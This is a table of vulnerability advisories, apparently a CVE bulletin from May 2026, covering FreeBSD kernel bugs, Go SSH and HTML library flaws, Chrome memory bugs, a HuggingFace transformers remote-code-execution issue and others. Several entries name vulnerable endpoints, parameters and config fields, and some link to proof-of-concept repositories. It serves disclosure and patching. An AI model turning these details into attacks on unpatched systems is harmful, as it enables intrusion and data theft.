| Drupal--Translate Drupal with GTranslate | Modification of Assumed-Immutable Data (MAID) vulnerability in Drupal Translate Drupal with GTranslate allows Resource Location Spoofing. This issue affects Translate Drupal with GTranslate: from 0.0.0 before 3.0.5. | 2026-05-19 | not yet calculated | CVE-2026-8492 | https://www.drupal.org/sa-contrib-2026-035 |
| Easy Chat--Easy Chat Server 3.1 | Directory Traversal vulnerability in Easy Chat Server 3.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via the UserName parameter | 2026-05-22 | not yet calculated | CVE-2026-36227 | http://easy.com https://github.com/NullByte8080/CVE-2026-36227 |
| Easy Chat--Easy Chat Server 3.1 | Buffer Overflow vulnerability in Easy Chat Server 3.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via the chat message functionality | 2026-05-22 | not yet calculated | CVE-2026-36228 | http://easy.com https://github.com/NullByte8080/CVE-2026-36228 |
| Epson--Epson L14150 FL27PB | Buffer Overflow vulnerability in EPSON L14150 FL27PB allows a remote attacker to execute arbitrary code via the RAW Printing Service (JetDirect) on TCP port 9100. | 2026-05-20 | not yet calculated | CVE-2026-39047 | https://github.com/AzhariRamadhan/CVE-PORT-9100 https://gist.github.com/AzhariRamadhan/1defc815542fb72e6025da2ce53a1046 |
| Follett--Software's Destiny Library Manager | Directory traversal in Follett Software's Destiny Library Manager 22_0_2_rc1 (fixed in v.22.5 AU1) allows remote attackers to read arbitrary system and application files via the image parameter. | 2026-05-22 | not yet calculated | CVE-2025-45145 | http://follett.com https://medium.com/@jaredutahusa/cve-2025-45145-unauthenticated-local-file-inclusion-in-fsc-destiny-40a3f11b3a4d |
| frappe--frappe | Frappe is a full-stack web application framework. Versions prior to 15.105.0 and 16.15.0 contain a possible Arbitrary File Read vulnerability via Path Traversal. The issue is resolved in versions 16.15.0, 15.105.0 and above. | 2026-05-20 | not yet calculated | CVE-2026-39352 | https://github.com/frappe/frappe/security/advisories/GHSA-67rf-pxgh-vfqv https://github.com/frappe/frappe/releases/tag/v16.15.0 |
| frappe--lms | Frappe Learning Management System (LMS) is a learning system that helps users structure their content. In versions 2.50.0 and below, a user with course editing role could upload a SCORM ZIP package to write files outside the intended directory. This issue has been resolved in version 2.50.1. | 2026-05-20 | not yet calculated | CVE-2026-39405 | https://github.com/frappe/lms/security/advisories/GHSA-mxh7-g3r7-g96h https://github.com/frappe/lms/releases/tag/v2.50.1 |
| FreeBSD--FreeBSD | libcasper(3) communicates with helper processes via UNIX domain sockets, and uses the select(2) system call to wait for data to become available. However, it does not verify that its socket descriptor fits within select(2)'s descriptor set size limit of FD_SETSIZE (1024). An attacker able to cause an application using libcasper(3) to allocate large file descriptors, e.g., by opening many descriptors and executing a program which is not careful to close them upon startup, may trigger stack corruption. If the target application runs with setuid root privileges, this could be used to escalate local privileges. | 2026-05-21 | not yet calculated | CVE-2026-39461 | https://security.freebsd.org/advisories/FreeBSD-SA-26:22.libcasper.asc |
| FreeBSD--FreeBSD | The setcred(2) system call is only available to privileged users. However, before the privilege level of the caller is checked, the user-supplied list of supplementary groups is copied into a fixed-size kernel stack buffer without first validating its length. If the supplied list exceeds the capacity of that buffer, a stack buffer overflow occurs. Because the bounds check on the supplementary groups list occurs after the kernel stack buffer has already been written, an unprivileged local user may trigger the overflow without holding any special privilege. Successful exploitation may allow an attacker to execute arbitrary code in the context of the kernel, allowing an unprivileged local user to gain elevated privileges on the affected system. | 2026-05-21 | not yet calculated | CVE-2026-45250 | https://security.freebsd.org/advisories/FreeBSD-SA-26:18.setcred.asc |
| FreeBSD--FreeBSD | A file descriptor can be closed while a thread is blocked in a poll(2) or select(2) call waiting for that descriptor. Because the blocked thread does not hold a reference to the underlying object, this closure may result in the object being freed while the thread remains blocked. In this situation, the kernel must remove the blocked thread from the per-object wait queue prior to freeing the object. In the case of some file descriptor types, the kernel failed to unlink blocked threads from the object before freeing it. When the blocked thread is subsequently woken, it accesses memory that has already been freed resulting in a use-after-free vulnerability. The use-after-free vulnerability may be triggered by an unprivileged local user and can be exploited to obtain superuser privileges. | 2026-05-21 | not yet calculated | CVE-2026-45251 | https://security.freebsd.org/advisories/FreeBSD-SA-26:19.file.asc |
| FreeBSD--FreeBSD | When a fusefs file system implements extended attributes, the kernel may send a FUSE_LISTXATTR message to the userspace daemon to retrieve the list of extended attributes for a given file. The FUSE protocol requires the daemon to return a packed list of NUL-terminated strings. The fusefs kernel module calls strlen() on this daemon-supplied buffer without first verifying that the entire list is NUL-terminated. If a malicious daemon sends a non-NUL-terminated list, the fusefs kernel module may read beyond the end of one heap-allocated buffer and potentially write beyond the end of a second buffer. A malicious daemon could disclose up to 253 bytes of kernel heap memory, or it could inject up to 250 attacker-controlled bytes into unallocated kernel heap space. | 2026-05-21 | not yet calculated | CVE-2026-45252 | https://security.freebsd.org/advisories/FreeBSD-SA-26:20.fusefs.asc |
| FreeBSD--FreeBSD | ptrace(PT_SC_REMOTE) failed to properly validate parameters for the syscall(2) and __syscall(2) meta-system calls. As a result, a user with the ability to debug a process may trigger arbitrary code execution in the kernel, even if the target process has no special privileges. The missing validation allows an unprivileged local user to escalate privileges, potentially gaining full control of the affected system. | 2026-05-21 | not yet calculated | CVE-2026-45253 | https://security.freebsd.org/advisories/FreeBSD-SA-26:21.ptrace.asc |
| FreeBSD--FreeBSD | In the case of the cap_net service, when a key present in the old limit was omitted from the new limit, the missing key was treated as "allow any" instead of being rejected. In certain scenarios, an application that had previously restricted a subset of network operations could ask for a new limit that extended the permissions of the process. | 2026-05-21 | not yet calculated | CVE-2026-45254 | https://security.freebsd.org/advisories/FreeBSD-SA-26:24.cap_net.asc |
| FreeBSD--FreeBSD | When bsdinstall or bsdconfig are prompted to scan for nearby Wi-Fi networks, they build up a list of network names and use bsddialog(1) to prompt the user to select a network. This is implemented using a shell script, and the code which handled network names was not careful to prevent expansion by the shell. As a result, a suitably crafted network name can be used to execute commands via a subshell. The problem can be exploited to execute code as root on the system running bsdinstall or bsdconfig. The attacker would need to create an access point with a specially crafted name and be within range of a Wi-Fi scan. Note that bsdinstall and bsdconfig are vulnerable as soon as the user prompts them to scan for nearby networks; they do not need to actually select the malicious network. | 2026-05-21 | not yet calculated | CVE-2026-45255 | https://security.freebsd.org/advisories/FreeBSD-SA-26:23.bsdinstall.asc |
| FreePBX--security-reporting | FreePBX is an open source IP PBX. In versions below 16.0.71 and 17.0.6, the backup module does not properly sanitize data during restore operations, potentially leading to compromise if the backup contains carefully crafted hostile data. During backup restore operations, FreePBX extracts selected files from a user-supplied tar archive. If a malicious file exists in the archive, it is read and passed directly to unserialize() without validation, class restrictions, or integrity checks. This issue allows Remote Code Execution during restoration of the backup as the web server user (typically asterisk or www-data). The attack does not require shell access, CLI access, or filesystem write permissions beyond the normal restore workflow. Authentication with a known username that has sufficient access permissions and/or write access to backup files is required. This issue has been fixed in versions 16.0.71 and 17.0.6. | 2026-05-18 | not yet calculated | CVE-2026-26978 | https://github.com/FreePBX/security-reporting/security/advisories/GHSA-5v7h-49gr-jcwr https://github.com/FreePBX/backup/commit/45c57e1207cbf9fd1c5f76f8a3e72d204a69a472 https://github.com/FreePBX/backup/commit/64781af5c80cce0cff21a981be4d8e6a7a71f2c4 |
| glpi-project--glpi | GLPI is a free asset and IT management software package. In versions 11.0.0 through 11.0.6, an authenticated user with forms READ permission can export the structure of unauthorized forms. This issue has been fixed in version 11.0.7. | 2026-05-18 | not yet calculated | CVE-2026-32312 | https://github.com/glpi-project/glpi/security/advisories/GHSA-cg63-qchq-q626 https://github.com/glpi-project/glpi/releases/tag/11.0.7 |
| goauthentik--authentik | authentik is an open-source identity provider. In versions prior to 2025.12.5 and 2026.2.0-rc1 through 2026.2.2, authenticated non-admin users with at least one OAuth2 access token can retrieve the client_secret of confidential OAuth2 providers they have previously authenticated against, exposing sensitive information to users without the correct permissions. The affected endpoint is GET /api/v3/oauth2/access_tokens/. The API response includes a nested provider object containing client_id and client_secret for providers configured with client_type: confidential, which should not be accessible to low-privilege users. This issue has been fixed in versions 2025.12.5 and 2026.2.3. | 2026-05-22 | not yet calculated | CVE-2026-40166 | https://github.com/goauthentik/authentik/security/advisories/GHSA-hhpc-rqgm-pxj4 https://github.com/goauthentik/authentik/releases/tag/version%2F2025.12.5 https://github.com/goauthentik/authentik/releases/tag/version%2F2026.2.3 |
| gohttp--gohttp | An issue in gohttp commit 34ea51 allows attackers to execute a directory traversal via supplying a crafted request. | 2026-05-19 | not yet calculated | CVE-2025-70950 | https://github.com/itang/gohttp/issues/13 https://gist.github.com/Lime-Cocoa/202127ae5f4dcc4b39909ce7ac1c8466 |
| golang.org/x/crypto--golang.org/x/crypto/ssh | An authenticated SSH client that repeatedly opened channels which were rejected by the server caused unbounded memory growth, eventually crashing the server process and affecting all connected users. Rejected channels are now properly removed from the connection's internal state and released for garbage collection. | 2026-05-22 | not yet calculated | CVE-2026-39827 | https://go.dev/issue/35127 https://go.dev/cl/781320 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://pkg.go.dev/vuln/GO-2026-5016 |
| golang.org/x/crypto--golang.org/x/crypto/ssh | When an SSH server authentication callback returned PartialSuccessError with non-nil Permissions, those permissions were silently discarded, potentially dropping certificate restrictions such as force-command after a second factor succeeded. Returning non-nil Permissions with PartialSuccessError now results in a connection error. | 2026-05-22 | not yet calculated | CVE-2026-39828 | https://go.dev/issue/79562 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://go.dev/cl/781621 https://pkg.go.dev/vuln/GO-2026-5014 |
| golang.org/x/crypto--golang.org/x/crypto/ssh | The RSA and DSA public key parsers did not enforce size limits on key parameters. A crafted public key with an excessively large modulus or DSA parameter could cause several minutes of CPU consumption during signature verification. This could be triggered by unauthenticated clients during public key authentication. RSA moduli are now limited to 8192 bits, and DSA parameters are validated per FIPS 186-2. | 2026-05-22 | not yet calculated | CVE-2026-39829 | https://go.dev/issue/79565 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://go.dev/cl/781641 https://go.dev/cl/781661 https://pkg.go.dev/vuln/GO-2026-5018 |
| golang.org/x/crypto--golang.org/x/crypto/ssh | A malicious SSH peer could send unsolicited global request responses to fill an internal buffer, blocking the connection's read loop. The blocked goroutine could not be released by calling Close(), resulting in a resource leak per connection. Unsolicited global responses are now discarded. | 2026-05-22 | not yet calculated | CVE-2026-39830 | https://go.dev/issue/79564 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://go.dev/cl/781640 https://go.dev/cl/781664 https://pkg.go.dev/vuln/GO-2026-5017 |
| golang.org/x/crypto--golang.org/x/crypto/ssh | The Verify() method for FIDO/U2F security key types (sk-ecdsa-sha2-nistp256@openssh.com, sk-ssh-ed25519@openssh.com) did not check the User Presence flag. Signatures generated without physical touch were accepted, allowing unattended use of a hardware security key. To restore the previous behavior, return a "no-touch-required" extension in Permissions.Extensions from PublicKeyCallback. | 2026-05-22 | not yet calculated | CVE-2026-39831 | https://go.dev/issue/79566 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://go.dev/cl/781662 https://pkg.go.dev/vuln/GO-2026-5019 |
| golang.org/x/crypto--golang.org/x/crypto/ssh | When writing data larger than 4GB in a single Write call on an SSH channel, an integer overflow in the internal payload size calculation caused the write loop to spin indefinitely, sending empty packets without making progress. The size comparison now uses int64 to prevent truncation. | 2026-05-22 | not yet calculated | CVE-2026-39834 | https://go.dev/issue/79567 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://go.dev/cl/781663 https://pkg.go.dev/vuln/GO-2026-5020 |
| golang.org/x/crypto--golang.org/x/crypto/ssh | SSH servers which use CertChecker as a public key callback without setting IsUserAuthority or IsHostAuthority could be caused to panic by a client presenting a certificate. CertChecker now returns an error instead of panicking when these callbacks are nil. | 2026-05-22 | not yet calculated | CVE-2026-39835 | https://go.dev/issue/79563 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://go.dev/cl/781660 https://pkg.go.dev/vuln/GO-2026-5015 |
| golang.org/x/crypto--golang.org/x/crypto/ssh | Previously, CVE-2024-45337 fixed an authorization bypass for misused ssh server configurations; if any type of callback other than public key is passed, then the source-address validation would be skipped. | 2026-05-22 | not yet calculated | CVE-2026-46595 | https://go.dev/issue/79570 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://go.dev/cl/781642 https://pkg.go.dev/vuln/GO-2026-5023 |
| golang.org/x/crypto--golang.org/x/crypto/ssh | An incorrectly placed cast from bytes to int allowed for server-side panic in the AES-GCM packet decoder for well-crafted inputs. | 2026-05-22 | not yet calculated | CVE-2026-46597 | https://go.dev/issue/79561 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://go.dev/cl/781620 https://pkg.go.dev/vuln/GO-2026-5013 |
| golang.org/x/crypto--golang.org/x/crypto/ssh/agent | When adding a key to a remote agent, constraint extensions such as restrict-destination-v00@openssh.com were not serialized in the request. Destination restrictions were silently stripped when forwarding keys, allowing unrestricted use of the key on the remote host. The client now serializes all constraint extensions. Additionally, the in-memory keyring returned by NewKeyring() now rejects keys with unsupported constraint extensions instead of silently ignoring them. | 2026-05-22 | not yet calculated | CVE-2026-39832 | https://go.dev/issue/79435 https://go.dev/cl/778642 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://pkg.go.dev/vuln/GO-2026-5006 |
| golang.org/x/crypto--golang.org/x/crypto/ssh/agent | The in-memory keyring returned by NewKeyring() silently accepted keys with the ConfirmBeforeUse constraint but never enforced it. The key would sign without any confirmation prompt, with no indication to the caller that the constraint was not in effect. NewKeyring() now returns an error when unsupported constraints are requested. | 2026-05-22 | not yet calculated | CVE-2026-39833 | https://go.dev/issue/79436 https://go.dev/cl/778640 https://go.dev/cl/778641 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://pkg.go.dev/vuln/GO-2026-5005 |
| golang.org/x/crypto--golang.org/x/crypto/ssh/agent | For certain crafted inputs, a 'ed25519.PrivateKey' was created by casting malformed wire bytes, leading to a panic when used. | 2026-05-22 | not yet calculated | CVE-2026-46598 | https://go.dev/issue/79596 https://go.dev/cl/781360 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://pkg.go.dev/vuln/GO-2026-5033 |
| golang.org/x/crypto--golang.org/x/crypto/ssh/knownhosts | Previously, a revoked 'SignatureKey' belonging to a CA was not correctly checked for revocation. Now, both the 'key' and 'key.SignatureKey' are checked for @revoked. | 2026-05-22 | not yet calculated | CVE-2026-42508 | https://go.dev/issue/79568 https://go.dev/cl/781220 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://pkg.go.dev/vuln/GO-2026-5021 |
| golang.org/x/net--golang.org/x/net/html | Parsing arbitrary HTML can consume excessive CPU time, possibly leading to denial of service. | 2026-05-22 | not yet calculated | CVE-2026-25680 | https://go.dev/cl/781702 https://go.dev/issue/79573 https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8 https://pkg.go.dev/vuln/GO-2026-5028 |
| golang.org/x/net--golang.org/x/net/html | Parsing arbitrary HTML which is then rendered using Render can result in an unexpected HTML tree. This can be leveraged to execute XSS attacks in applications that attempt to sanitize input HTML before rendering. | 2026-05-22 | not yet calculated | CVE-2026-25681 | https://go.dev/issue/79574 https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8 https://go.dev/cl/781703 https://pkg.go.dev/vuln/GO-2026-5029 |
| golang.org/x/net--golang.org/x/net/html | Parsing arbitrary HTML which is then rendered using Render can result in an unexpected HTML tree. This can be leveraged to execute XSS attacks in applications that attempt to sanitize input HTML before rendering. | 2026-05-22 | not yet calculated | CVE-2026-27136 | https://go.dev/issue/79575 https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8 https://go.dev/cl/781685 https://pkg.go.dev/vuln/GO-2026-5030 |
| golang.org/x/net--golang.org/x/net/html | Parsing arbitrary HTML which is then rendered using Render can result in an unexpected HTML tree. This can be leveraged to execute XSS attacks in applications that attempt to sanitize input HTML before rendering. | 2026-05-22 | not yet calculated | CVE-2026-42502 | https://go.dev/issue/79572 https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8 https://go.dev/cl/781701 https://pkg.go.dev/vuln/GO-2026-5027 |
| golang.org/x/net--golang.org/x/net/html | Parsing arbitrary HTML which is then rendered using Render can result in an unexpected HTML tree. This can be leveraged to execute XSS attacks in applications that attempt to sanitize input HTML before rendering. | 2026-05-22 | not yet calculated | CVE-2026-42506 | https://go.dev/issue/79571 https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8 https://go.dev/cl/781700 https://pkg.go.dev/vuln/GO-2026-5025 |
| golang.org/x/net--golang.org/x/net/idna | The ToASCII and ToUnicode functions incorrectly accept Punycode-encoded labels that decode to an ASCII-only label. For example, ToUnicode("xn--example-.com") incorrectly returns the name "example.com" rather than an error. This behavior can lead to privilege escalation in programs using the idna package. For example, a program which performs privilege checks on the ASCII hostname may reject "example.com" but permit "xn--example-.com". If that program subsequently converts the ASCII hostname to Unicode, it will inadvertently permit access to the Unicode name "example.com". | 2026-05-22 | not yet calculated | CVE-2026-39821 | https://go.dev/cl/767220 https://go.dev/issue/78760 https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8 https://pkg.go.dev/vuln/GO-2026-5026 |
| golang.org/x/sys--golang.org/x/sys/windows | NewNTUnicodeString does not check for string length overflow. When provided with a string that overflows the maximum size of a NTUnicodeString (a 16-bit number of bytes), it returns a truncated string rather than an error. | 2026-05-22 | not yet calculated | CVE-2026-39824 | https://go.dev/issue/78916 https://go.dev/cl/770080 https://groups.google.com/g/golang-announce/c/6MMI8Lj-Atg https://pkg.go.dev/vuln/GO-2026-5024 |
| Google--Chrome | Inappropriate implementation in UI in Google Chrome on Windows prior to 148.0.7778.179 allowed a remote attacker who had compromised the renderer process to perform UI spoofing via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-20 | not yet calculated | CVE-2026-9110 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/503551154 |
| Google--Chrome | Use after free in WebRTC in Google Chrome on Linux prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-20 | not yet calculated | CVE-2026-9111 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/504551032 |
| Google--Chrome | Use after free in GPU in Google Chrome on Windows prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9112 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/489791425 |
| Google--Chrome | Out of bounds read in GPU in Google Chrome on Mac prior to 148.0.7778.179 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9113 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/489585044 |
| Google--Chrome | Use after free in QUIC in Google Chrome on prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code inside a sandbox via malicious network traffic. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9114 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/495798630 |
| Google--Chrome | Insufficient policy enforcement in Service Worker in Google Chrome on prior to 148.0.7778.179 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9115 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/495999481 |
| Google--Chrome | Insufficient policy enforcement in ServiceWorker in Google Chrome on prior to 148.0.7778.179 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9116 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/497436273 |
| Google--Chrome | Type Confusion in GFX in Google Chrome on Linux, ChromeOS prior to 148.0.7778.179 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted video file. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9117 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/497542537 |
| Google--Chrome | Use after free in XR in Google Chrome on Windows prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9118 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/498702233 |
| Google--Chrome | Heap buffer overflow in WebRTC in Google Chrome on prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9119 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/502661101 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9120 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/504620824 |
| Google--Chrome | Out of bounds read in GPU in Google Chrome on prior to 148.0.7778.179 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-20 | not yet calculated | CVE-2026-9121 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/488064108 |
| Google--Chrome | Out of bounds read in GPU in Google Chrome on Mac prior to 148.0.7778.179 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-20 | not yet calculated | CVE-2026-9122 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/489579953 |
| Google--Chrome | Heap buffer overflow in Chromecast in Google Chrome on Android, Linux, ChromeOS prior to 148.0.7778.179 allowed a local attacker to execute arbitrary code inside a sandbox via malicious network traffic. (Chromium security severity: Medium) | 2026-05-20 | not yet calculated | CVE-2026-9123 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/495988507 |
| Google--Chrome | Insufficient validation of untrusted input in Input in Google Chrome on prior to 148.0.7778.179 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-20 | not yet calculated | CVE-2026-9124 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/496375695 |
| Google--Chrome | Use after free in DOM in Google Chrome on prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-20 | not yet calculated | CVE-2026-9126 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/496280532 |
| HP Inc--HP Linux Imaging and Printing Software | A potential security vulnerability has been identified in the HP Linux Imaging and Printing Software. This potential vulnerability may allow escalation of privileges and/or arbitrary code execution via an integer overflow in the hpcups processing path when handling crafted print data. | 2026-05-20 | not yet calculated | CVE-2026-8631 | https://support.hp.com/us-en/document/ish_14942099-14942126-16/hpsbpi04118 |
| HP Inc--HP Linux Imaging and Printing Software | A potential security vulnerability has been identified in the HP Linux Imaging and Printing Software. This potential vulnerability may allow escalation of privileges and/or arbitrary code execution via operating system command injection. | 2026-05-20 | not yet calculated | CVE-2026-8632 | https://support.hp.com/us-en/document/ish_14942099-14942126-16/hpsbpi04118 |
| HP--ENVY 5000 | HP ENVY 5000 series printers VERBASPP1N003.2237A.00 do not properly manage concurrent TCP connections to port 9100 (JetDirect/RAW printing). An unauthenticated remote attacker on the same network can establish a persistent connection to port 9100 and send keep-alive packets, causing the printer's session threads to remain locked in a waiting state. The firmware lacks connection timeouts and concurrent session limits, resulting in a persistent Denial of Service (DoS) that renders the printer unresponsive to all user commands and print jobs. Physical intervention (manual restart) is required to restore functionality, and the attack can be immediately re-initiated. | 2026-05-22 | not yet calculated | CVE-2026-42626 | https://medium.com/@jacobmasse/hp-envy-5000-printer-dos-vulnerability-8cae52c87b41 |
| HSC--MailInspector v5.3.3-7 | HSC MailInspector v5.3.3-7 contains a Local File Inclusion (LFI) vulnerability caused by improper control of user-supplied file paths. The endpoint /vendor/phpunit/phpunit.php processes user-controlled parameters that directly affect file access operations without adequate validation, sanitization, or path restriction. This allows a remote attacker to exploit Path Traversal techniques to read arbitrary files from the underlying operating system and application directories, leading to sensitive information disclosure. | 2026-05-18 | not yet calculated | CVE-2026-29962 | https://github.com/sql3t0/cve-disclosures https://hsclabs.com/pt-br/mailinspector https://github.com/sql3t0/cve-disclosures/blob/main/01_-_CVE-2026-29962_LFI%2BPath_Traversal.md |
| HSC--MailInspector v5.3.3-7 | HSC MailInspector 5.3.3-7 has a Path Traversal vulnerability due to improper validation of user-supplied input in the /tap/dw.php endpoint. The text parameter is used to construct file paths without adequate normalization or restriction to a safe base directory. A remote attacker can exploit this flaw to access arbitrary files on the underlying operating system, resulting in unauthorized disclosure of sensitive information. | 2026-05-18 | not yet calculated | CVE-2026-29963 | https://hsclabs.com/pt-br/mailinspector/ https://github.com/sql3t0/cve-disclosures https://github.com/sql3t0/cve-disclosures/blob/main/02_-_CVE-2026-29963_LFI%2BPath_Traversal.md |
| HSC--MailInspector v5.3.3-7 | HSC MailInspector v5.3.3-7 contains a Cross-Site Scripting (XSS) vulnerability in the /tap/tap.php endpoint due to improper neutralization of user-controlled input using alternate or obfuscated JavaScript syntax. The endpoint reflects unsanitized user input in HTTP responses without adequate output encoding, allowing a remote attacker to execute arbitrary JavaScript code in the context of a victim's browser. | 2026-05-18 | not yet calculated | CVE-2026-29964 | https://hsclabs.com/pt-br/mailinspector/ https://github.com/sql3t0/cve-disclosures https://github.com/sql3t0/cve-disclosures/blob/main/03_-_CVE-2026-29964_XSS.md |
| HSC--MailInspector v5.3.3-7 | HSC MailInspector 5.3.3-7 is vulnerable to Cross Site Scripting (XSS) in the /police/WarningUrlPage.php endpoint due to improper neutralization of user-supplied input that uses alternate or obfuscated JavaScript syntax. | 2026-05-18 | not yet calculated | CVE-2026-29965 | https://hsclabs.com/pt-br/mailinspector/ https://github.com/sql3t0/cve-disclosures https://github.com/sql3t0/cve-disclosures/blob/main/04_-_CVE-2026-29965_XSS.md |
| huggingface--huggingface/transformers | A critical remote code execution vulnerability exists in all versions of the HuggingFace transformers library prior to version 5.3.0. The vulnerability allows an attacker to craft a malicious `config.json` file containing the `_attn_implementation_internal` field set to an attacker-controlled HuggingFace Hub repository ID. When a victim loads this model using the standard `AutoModelForCausalLM.from_pretrained()` API, the library downloads and executes arbitrary Python code from the attacker's repository with the victim's full OS privileges. This issue arises due to unfiltered deserialization of configuration attributes, insufficient sanitization of internal fields, and unsandboxed execution of downloaded kernels. The vulnerability bypasses the `trust_remote_code` security mechanism, is invisible to the victim, and exploits the standard documented usage pattern, making it particularly severe. Users are advised to upgrade to version 5.3.0 or later to mitigate this issue. | 2026-05-24 | not yet calculated | CVE-2026-4372 | https://huntr.com/bounties/1f693a6e-6836-4b8b-a0bd-ca036fba8884 https://github.com/huggingface/transformers/commit/a7f8e7ff37d87d1a1a0c8cf607971c607741452f |
| InfoScale--CmdServer | InfoScale CmdServer before 7.4.2 mishandles access control. | 2026-05-20 | not yet calculated | CVE-2026-44926 | https://www.veritas.com/support/en_US/doc/109864724-141543588-0/v141217547-141543588 https://supportinfoscale.cloud.com/support-home/kbsearch/article?articleNumber=1000766081&articleTitle=InfoScale_Command_Server_Security_Bulletin_for_CVE_2026_44926 |
| InfoScale--VIOM | SQL injection in InfoScale VIOM before v9.1.3 allows remote attackers to escalate privileges. | 2026-05-20 | not yet calculated | CVE-2026-44923 | https://www.veritas.com/support/en_US/doc/120571566-166757640-0/viom_tot_v118836641-166757640 https://supportinfoscale.cloud.com/support-home/kbsearch/article?articleNumber=1000766080&articleTitle=InfoScale_Operations_Manager_IOM_web_application_Security_Bulletin_for_CVE_2026_44923_CVE_2026_44924_and_CVE_2026_44925 |
| InfoScale--VIOM | InfoScale VIOM 9.1.3 allows XSS. | 2026-05-20 | not yet calculated | CVE-2026-44924 | https://www.veritas.com/support/en_US/doc/120571566-166757640-0/viom_tot_v118836641-166757640 https://supportinfoscale.cloud.com/support-home/kbsearch/article?articleNumber=1000766080&articleTitle=InfoScale_Operations_Manager_IOM_web_application_Security_Bulletin_for_CVE_2026_44923_CVE_2026_44924_and_CVE_2026_44925 |
| InfoScale--VIOM | Cross-Site Request Forgery (CSRF) vulnerability in InfoScale v.9.1.3 Operations Manager (VIOM) allows an attacker to force the user with an active session into clicking a malicious HTML link, which triggers unintended modifications on VIOM web application without the user's knowledge. | 2026-05-20 | not yet calculated | CVE-2026-44925 | https://www.veritas.com/support/en_US/doc/120571566-166757640-0/viom_tot_v118836641-166757640 https://supportinfoscale.cloud.com/support-home/kbsearch/article?articleNumber=1000766080&articleTitle=InfoScale_Operations_Manager_IOM_web_application_Security_Bulletin_for_CVE_2026_44923_CVE_2026_44924_and_CVE_2026_44925 |
| Innoshop--Innoshop 0.6.0 | An authorization vulnerability exists in Innoshop 0.6.0. After logging into the frontend, an attacker can directly access backend application interfaces, leading to further dangerous operations. | 2026-05-19 | not yet calculated | CVE-2026-39250 | https://www.innoshop.com/ https://gist.github.com/hkdmh/4af513ea7589212cb1d49bc5d972972e |
